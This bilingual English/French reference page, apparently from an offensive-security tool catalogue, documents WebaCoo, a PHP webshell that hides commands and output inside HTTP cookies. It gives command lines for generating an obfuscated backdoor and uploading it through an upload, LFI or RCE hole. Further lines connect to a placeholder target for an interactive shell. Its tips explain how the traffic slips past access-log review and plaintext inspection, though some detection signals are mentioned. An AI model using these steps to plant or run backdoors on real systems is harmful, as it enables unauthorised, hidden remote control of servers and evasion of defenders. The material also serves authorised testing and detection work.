WebaCoo
Webshell PHP furtif qui communique via des cookies HTTP plutôt que le corps de la requête, échappant à certaines détections basées sur les logs. Stealthy PHP webshell that communicates via HTTP cookies rather than the request body, evading some log-based detection.
↗ https://github.com/anestisb/webacooOverview
WebaCoo (Web Backdoor Cookie) is a small PHP webshell built to be harder to spot in logs and casual inspection: instead of passing commands and output through visible POST/GET parameters, it hides them inside HTTP cookies, and its payload is obfuscated. It ships with a client script that handles the cookie encoding/decoding, giving an interactive-feeling shell over what looks like ordinary cookie traffic.
Common Usage
Generate an obfuscated PHP backdoor payload to upload to the target
webacoo -g -o backdoor.php
Connect to an already-deployed backdoor and get an interactive shell
webacoo -t -u http://target.com/uploads/backdoor.php
Run a single command non-interactively
webacoo -t -u http://target.com/uploads/backdoor.php -c "id"
Route the connection through a proxy (e.g. Burp for inspection)
webacoo -t -u http://target.com/uploads/backdoor.php -p 127.0.0.1:8080
Deployment Workflow
- Generate the obfuscated payload
webacoo -g -o shell.php
# 2. Upload shell.php via whatever upload/LFI/RCE vector was found
# (file upload form, webdav, etc.)
- Connect back to it as a client
webacoo -t -u http://target.com/images/shell.php
# 4. Interact — commands and output travel inside Cookie headers,
# blending in with normal-looking HTTP traffic in access logs
Tips
- Since command/output data rides in cookies, it won’t show up in the request body or URL — a plain access-log review is far less likely to flag it than a typical
cmd=webshell. - Still detectable by WAFs/EDR that inspect cookie contents or by anomaly detection on cookie size/entropy.
- Combine with HTTPS deployment (upload over TLS) to also defeat plaintext network inspection.
Help / Man page
webacoo [options]
-g Generate backdoor payload
-o FILE Output file for generated payload
-t Terminal/client mode — connect to a deployed backdoor
-u URL URL of the deployed backdoor
-c CMD Run a single command non-interactively
-p HOST:PORT Proxy to route requests through
-f FILE Load command list from file
-v Verbose output
-h Show help
Vue d’ensemble
WebaCoo (Web Backdoor Cookie) est un petit webshell PHP conçu pour être difficile à repérer dans les logs et lors d’une inspection rapide : au lieu de faire passer les commandes et la sortie par des paramètres POST/GET visibles, il les cache dans des cookies HTTP, et son payload est obfusqué. Il est fourni avec un script client qui gère l’encodage/décodage des cookies, offrant un shell à l’apparence interactive au-dessus de ce qui ressemble à du trafic de cookies ordinaire.
Utilisation courante
# Générer un payload de backdoor PHP obfusqué à téléverser sur la cible
webacoo -g -o backdoor.php
# Se connecter à une backdoor déjà déployée et obtenir un shell interactif
webacoo -t -u http://target.com/uploads/backdoor.php
# Exécuter une seule commande de façon non interactive
webacoo -t -u http://target.com/uploads/backdoor.php -c "id"
# Router la connexion via un proxy (par exemple Burp pour inspection)
webacoo -t -u http://target.com/uploads/backdoor.php -p 127.0.0.1:8080
Flux de déploiement
# 1. Générer le payload obfusqué
webacoo -g -o shell.php
# 2. Téléverser shell.php via le vecteur d'upload/LFI/RCE trouvé
# (formulaire d'upload de fichier, webdav, etc.)
# 3. S'y reconnecter en tant que client
webacoo -t -u http://target.com/images/shell.php
# 4. Interagir : les commandes et la sortie transitent dans les en-têtes Cookie,
# se fondant dans un trafic HTTP d'apparence normale dans les logs d'accès
Conseils
- Comme les données de commande/sortie voyagent dans les cookies, elles n’apparaissent ni dans le corps de la requête ni dans l’URL : une simple revue des logs d’accès a beaucoup moins de chances de le détecter qu’un webshell classique en
cmd=. - Toujours détectable par les WAF/EDR qui inspectent le contenu des cookies ou par une détection d’anomalie sur la taille/l’entropie des cookies.
- Combiner avec un déploiement en HTTPS (upload via TLS) pour aussi déjouer l’inspection réseau en clair.
Aide / Page de manuel
webacoo [options]
-g Generate backdoor payload
-o FILE Output file for generated payload
-t Terminal/client mode — connect to a deployed backdoor
-u URL URL of the deployed backdoor
-c CMD Run a single command non-interactively
-p HOST:PORT Proxy to route requests through
-f FILE Load command list from file
-v Verbose output
-h Show help